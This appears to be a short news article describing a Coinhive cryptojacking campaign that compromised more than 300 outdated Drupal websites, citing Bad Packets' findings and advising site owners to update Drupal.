Drupal Sites Targeted by Large Cryptojacking Campaign

With cryptocurrencies growing in interest all over the world, some hackers invented new ways to mine virtual currencies. By injecting a malicious code in some websites, the hackers are able to steal the unused CPU power of the visitors. But it seems that some websites are more vulnerable than others. We are talking about Drupal sites.

Massive Cryptojacking Attack

According to Bad Packets, there was an ongoing cryptojacking campaign affecting different websites, including the San Diego Zoo and the government of Chihuahua, Mexico. The site explains that both sites are not related with each other, but they use an ‘outdated and vulnerable’ version of the Drupal content management system. But apparently, there were more than 300 websites affected by the same cryptojacking campaign.

The pages affected have been injected with Coinhive, the software used to steal visitors’ CPU power.

The report presented by Bad Packets reads as follows:

“Digging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method. The malicious code was contained in the “/misc/jquery.once.js?v=1.2” JavaScript library. Soon thereafter, I was notified of additional compromised sites using a different payload. However, all the infected sites pointed to the same domain using the same Coinhive site key.”

The historical DNS data collected from SecurityTrails revealed that the domain name vuuwd.com, was used previously in Monero (XMR) mining operations through mineXRM.com. The report says that they have switched from a mining pool with 1% fee to Coinhive, who takes 30% of all the mining proceeds.

The important conclusion was that all the 348 infected websites analyzed were using an outdated version of the Drupal content management system. In the past, the Drupalgeddon 2 has been exploited as well. Those websites using Drupal need to change to the latest available version to avoid being infected by Coinhive injections.

There is a website that was created to help test your web browsers to see if it has been infected by cryptojacking malware – find our review of that here – also be sure to see our report on Ahref's cryptocurrency hijacking mining research they released a few months ago.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

one + 13 =